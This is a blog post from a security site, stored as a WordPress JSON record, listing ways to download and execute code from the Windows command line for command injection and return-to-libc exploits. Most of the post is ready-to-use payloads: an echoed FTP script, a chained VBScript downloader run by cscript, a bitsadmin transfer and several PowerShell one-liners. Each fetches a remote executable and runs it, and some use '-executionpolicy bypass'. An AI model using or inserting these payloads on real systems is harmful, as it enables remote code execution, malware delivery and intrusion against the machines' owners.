{"id":500,"date":"2012-01-06T21:27:03","date_gmt":"2012-01-06T20:27:03","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=500"},"modified":"2013-03-21T21:17:28","modified_gmt":"2013-03-21T20:17:28","slug":"ways-to-download-and-execute-code-via-the-commandline","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=500","title":{"rendered":"Ways to Download and Execute code via the Commandline"},"content":{"rendered":"

In this post I am just highlighting some of the ways that I know of where we can download and execute code via the commandline which could be used in command injection vulnerabilities or exploiting buffer overflows using the classic ret-to-libc method. Most of you would most probably know these methods but I thought I’d post it anyway for my own reference.<\/p>\n

FTP method<\/strong>
\nFTP can be used to download a binary and then get executed with the start command. The downside to this method is that we’ll need to have a FTP server hosting the binary file. Nevertheless the command string length can be reasonably small.<\/p>\n

Here the ftp commands which are first echoed to create a script, then run the script by ftp.exe to download the binary and finally executing the binary.<\/p>\n

open 192.168.1.3\r\nbinary\r\nget \/messbox.exe\r\nquit<\/pre>\n
cmd.exe \/c \"@echo open 192.168.1.3>script.txt&@echo binary>>script.txt&\r\n@echo get \/messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:scrip\r\nt.txt -v -A&@start messbox.exe\"<\/pre>\n
We can make the command string smaller by using o for open and b for binary. Also our script file can also be represented as a single character.<\/p>\n
\"\"<\/p>\n
WSH method<\/strong>
\nWindows Scripting Host can also be used to download and execute code. For this we again need to echo out the scripting code to a file and then run our script by cscript.exe.<\/p>\n
strFileURL = \"http:\/\/www.greyhathacker.net\/tools\/messbox.exe\"\r\nstrHDLocation = \"mess.exe\"\r\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nobjXMLHTTP.open \"GET\", strFileURL, false\r\nobjXMLHTTP.send()\r\nIf objXMLHTTP.Status = 200 Then\r\nSet objADOStream = CreateObject(\"ADODB.Stream\")\r\nobjADOStream.Open\r\nobjADOStream.Type = 1\r\nobjADOStream.Write objXMLHTTP.ResponseBody\r\nobjADOStream.Position = 0\u00a0\u00a0\u00a0\r\nobjADOStream.SaveToFile strHDLocation\r\nobjADOStream.Close\r\nSet objADOStream = Nothing\r\nEnd if\r\nSet objXMLHTTP = Nothing\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nobjShell.Exec(\"mess.exe\")<\/pre>\n
Below is the code that is chained up and then using cscript.exe to run our script.<\/p>\n
cmd.exe \/c \"@echo Set objXMLHTTP=CreateObject(\"MSXML2.XMLHTTP\")>poc.vbs\r\n&@echo objXMLHTTP.open \"GET\",\"http:\/\/www.greyhathacker.net\/tools\/messbo\r\nx.exe\",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH\r\nTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject(\"ADODB\r\n.Stream\")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.\r\nType=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.\r\nvbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi\r\nle \"mess.exe\">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA\r\nDOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No\r\nthing>>poc.vbs&@echo Set objShell=CreateObject(\"WScript.Shell\")>>poc.vb\r\ns&@echo objShell.Exec(\"mess.exe\")>>poc.vbs&cscript.exe poc.vbs\"<\/pre>\n
\"\"<\/p>\n
BITSadmin method<\/strong>
\nWindows 7 comes with a console tool called bitsadmin.exe which can be used to download and upload files. The cool thing about bitsadmin is that it suspends the transfer if a network connection is lost. After reconnection the transfer continues where it left off and executes our code.<\/p>\n
cmd.exe \/c \"bitsadmin \/transfer myjob \/download \/priority high http:\/\/w\r\nww.greyhathacker.net\/tools\/messbox.exe c:\\mess.exe&start mess.exe\"<\/pre>\n
\"\"<\/p>\n
PowerShell method<\/strong>
\nPowershell is a scripting language which comes as standard in Windows 7. Below is a script which downloads and executes mess.exe.<\/p>\n
$down = New-Object System.Net.WebClient\r\n$url\u00a0 = 'http:\/\/www.greyhathacker.net\/tools\/messbox.exe';\r\n$file = 'mess.exe';\r\n$down.DownloadFile($url,$file);\r\n$exec = New-Object -com shell.application\r\n$exec.shellexecute($file);<\/pre>\n
We can echo this script to a file and then run the script using Powershell with the “bypass” parameter as by default the Powershell policy is set to “restricted”.<\/p>\n
powershell.exe -executionpolicy bypass -file poc.ps1<\/pre>\n
Another elegant way to run our code without any scripts is by chaining our code in one line as shown below<\/p>\n
PowerShell (New-Object System.Net.WebClient).DownloadFile('http:\/\/www.g\r\nreyhathacker.net\/tools\/messbox.exe','mess.exe');Start-Process 'mess.exe'<\/pre>\n
PowerShell (New-Object System.Net.WebClient).DownloadFile('http:\/\/www.g\r\nreyhathacker.net\/tools\/messbox.exe','mess.exe');(New-Object -com Shell.\r\nApplication).ShellExecute('mess.exe');<\/pre>\n
\"\"<\/p>\n
References:<\/p>\n
http:\/\/technet.microsoft.com\/en-us\/library\/dd347628.aspx<\/a>
\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/aa362812.aspx<\/a>
\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/aa362813(v=vs.85).aspx<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
In this post I am just highlighting some of the ways that I know of where we can download and execute code via the commandline which could be used in command injection vulnerabilities or exploiting buffer overflows using the classic ret-to-libc method. Most of you would most probably know these methods but I thought I’d […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,34],"tags":[35,13],"class_list":["post-500","post","type-post","status-publish","format-standard","hentry","category-all","category-other","tag-download-and-execute","tag-return-to-libc"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=500"}],"version-history":[{"count":16,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/500\/revisions"}],"predecessor-version":[{"id":696,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/500\/revisions\/696"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}